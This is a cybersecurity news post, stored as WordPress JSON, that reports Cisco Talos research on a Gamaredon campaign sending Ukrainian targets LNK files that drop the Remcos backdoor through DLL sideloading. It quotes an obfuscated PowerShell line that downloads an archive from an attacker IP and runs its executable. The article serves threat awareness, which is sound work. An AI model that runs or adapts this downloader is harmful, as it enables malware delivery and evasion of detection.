{"id":2928,"date":"2025-03-29T10:05:42","date_gmt":"2025-03-29T10:05:42","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/03\/29\/gamaredon-hacker-group-using-weaponize-lnk-files-to-drop-remcos-backdoor-on-windows\/"},"modified":"2025-03-29T10:05:42","modified_gmt":"2025-03-29T10:05:42","slug":"gamaredon-hacker-group-using-weaponize-lnk-files-to-drop-remcos-backdoor-on-windows","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/03\/29\/gamaredon-hacker-group-using-weaponize-lnk-files-to-drop-remcos-backdoor-on-windows\/","title":{"rendered":"Gamaredon Hacker Group\u00a0Using Weaponize LNK Files To Drop Remcos Backdoor on Windows"},"content":{"rendered":"<p>    Gamaredon Hacker Group\u00a0Using Weaponize LNK Files To Drop Remcos Backdoor on Windows<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group.<\/p>\n<p>The attackers are leveraging weaponized LNK files disguised as Office documents to deliver the <a href=\"https:\/\/cybersecuritynews.com\/remcos-everywhere\/\" target=\"_blank\" rel=\"noreferrer noopener\">Remcos<\/a> backdoor malware, utilizing themes related to troop movements in Ukraine as a social engineering lure to trick victims into executing the malicious files.<\/p>\n<p>The attack begins when victims receive ZIP archives containing LNK shortcuts masquerading as important military documents with names like \u201cProbable location of communication nodes, electronic warfare installations and enemy UAV calculations\u201d and \u201cCoordinates of enemy takeoffs for 8 days.\u201d<\/p>\n<p>When executed, these shortcuts silently run <a href=\"https:\/\/cybersecuritynews.com\/invokeadcheck-powershell-based-tool\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell<\/a> code that initiates the infection chain while displaying a decoy document to maintain the illusion of legitimacy.<\/p>\n<p>Cisco Talos researchers <a href=\"https:\/\/blog.talosintelligence.com\/gamaredon-campaign-distribute-remcos\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> this campaign has been active since at least November 2024, with evidence suggesting Gamaredon is specifically targeting Ukrainian government organizations, critical infrastructure, and entities affiliated with Ukraine\u2019s defense and security apparatus.<\/p>\n<p>The researchers noted the advanced evasion techniques employed throughout the attack chain.<\/p>\n<p>The PowerShell downloader utilizes obfuscation methods to evade detection, communicating with geo-fenced servers located in Russia and Germany to retrieve the second-stage payload.<\/p>\n<p>This selective targeting restricts access to the malicious payloads to victims located within Ukraine, helping the campaign remain under the radar.<\/p>\n<p>The threat actors employ a particularly effective technique whereby PowerShell executes commands indirectly through the Get-Command cmdlet to bypass string-based detection by security solutions:-<\/p>\n<pre class=\"wp-block-code\"><code>if (-not(Test-Path tvdiag.''z''i''p -PathType Leaf)){&amp;(g' cm) -uri ht''tp'':'\/'\/'146'.'1''85''.''233''.''96''\/xallat\/tvdiag.''zi''p -OutFile tvdiag.''zi''p}; Expand-Archive -Path tvdiag.''zi''p -DestinationPath Drvx64; star''t Drvx64\/TiVoDiag.''e''xe;<\/code><\/pre>\n<h2 class=\"wp-block-heading\"><strong>DLL Sideloading Technique<\/strong><\/h2>\n<p>The second-stage payload employs <a href=\"https:\/\/cybersecuritynews.com\/threat-actors-exploiting-dll-side-loading-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">DLL sideloading<\/a>, a sophisticated technique where legitimate applications are abused to load malicious code.<\/p>\n<p>In this case, clean applications like TiVoDiag.exe load malicious DLLs such as \u201cmindclient.dll\u201d during execution. The malicious DLL then decrypts and executes the final Remcos backdoor payload from encrypted files within the downloaded ZIP archive.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjdFIknudwgYjGOVdCMd4ye0Ag4FVkoW-Kw0yyRIZ4bjmuNKFJrICb4hL7qMCPLlkX1MHI5A8-dAzoOarK0SX1OuEvdB1gsd_hffkmy9gU5to5toC5TpFIub0eiW2kqyXb8HjKeP69Y1BJCts3pg1e7viw2iOwHYHcF6S9unkAAGfUHXu0GAx2kQH0cSjo\/s16000\/TivoDiag.exe%2520load%2520malicious%2520DLL%2520%28Source%2520-%2520Cisco%2520Talos%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">TivoDiag.exe load malicious DLL (Source \u2013 Cisco Talos)<\/figcaption><\/figure>\n<\/div>\n<p>This technique takes advantage of the Windows DLL search order, allowing attackers to place their malicious DLL alongside a legitimate executable.<\/p>\n<p>When the executable runs and attempts to load a required DLL, it loads the malicious version instead due to Windows\u2019 predictable search paths.<\/p>\n<p>Once executed, the Remcos payload injects itself into the Explorer.exe process and establishes communication with command and control servers, primarily hosted on GTHost and HyperHosting infrastructure.<\/p>\n<p>The backdoor uses port 6856 for command and control operations, enabling the attackers to maintain persistent access to compromised systems for espionage purposes.<\/p>\n<p>This campaign demonstrates Gamaredon\u2019s continued focus on cyber espionage against Ukrainian targets, with the group adapting its tactics to include commercial malware alongside its custom tools.<\/p>\n<p>Organizations in Ukraine and allied nations should implement recommended security measures and monitor for indicators of compromise associated with this campaign.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/gamaredon-hacker-group-using-weaponize-lnk-files\/\">Gamaredon Hacker Group\u00a0Using Weaponize LNK Files To Drop Remcos Backdoor on Windows<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/gamaredon-hacker-group-using-weaponize-lnk-files\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gamaredon Hacker Group\u00a0Using Weaponize LNK Files To Drop Remcos Backdoor on Windows A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group. The attackers are leveraging weaponized LNK files disguised as Office documents to deliver the Remcos backdoor malware, utilizing themes related to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-2928","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2928"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=2928"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2928\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=2928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=2928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=2928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}